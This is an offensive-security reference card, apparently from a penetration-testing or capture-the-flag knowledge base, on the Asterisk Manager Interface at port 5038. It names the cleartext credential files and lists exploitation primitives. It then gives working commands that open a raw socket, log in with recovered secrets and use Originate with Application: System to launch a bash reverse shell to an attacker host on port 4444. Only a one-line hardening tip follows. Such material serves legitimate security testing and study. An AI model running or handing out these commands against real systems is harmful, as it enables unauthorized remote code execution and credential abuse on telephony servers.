Asterisk AMI
aka Asterisk Manager Interface, AMI
Asterisk Manager Interface on 5038, a control socket whose credentials sit in cleartext config. With them, the Originate/System actions run shell commands as the asterisk user.
Ports
| Port | Proto | Notes |
|---|---|---|
5038 | tcp | Asterisk Manager Interface |
Fingerprint
- Banner: Asterisk Call Manager/<version>
- Often filtered externally; reachable post-foothold or via SSRF
Key files
| Path | Holds | Sensitive |
|---|---|---|
/etc/asterisk/manager.conf | AMI usernames and secrets in cleartext | sensitive |
/etc/asterisk/manager_additional.conf | additional AMI secrets | sensitive |
Default / weak creds
cleartext user/secret pairs from manager.conf
Service users
asterisk
Exploitation primitives
- Action: Login, then Action: Originate with Application: System (or Exec) runs a command as the asterisk user
- Command action exposes the Asterisk CLI
- Recovered AMI secrets are often reused elsewhere on the box
Overview
AMI is Asterisk’s management socket on 5038. Its credentials live in cleartext in manager.conf, and the protocol can originate a call into the dialplan that runs a system command, which is an RCE primitive as the asterisk user.
Exploitation
Open a raw socket to AMI:
exec 3<>/dev/tcp/<TARGET>/5038Log in:
printf 'Action: Login\r\nUsername: admin\r\nSecret: <secret>\r\n\r\n' >&3Originate a call that runs your command as asterisk:
printf 'Action: Originate\r\nChannel: Local/x@from-internal\r\nApplication: System\r\nData: bash -c "bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1"\r\n\r\n' >&3Hardening
Bind AMI to localhost, use strong per-user secrets with permit ACLs, and restrict the originate/system privileges.
Seen on these machines 1
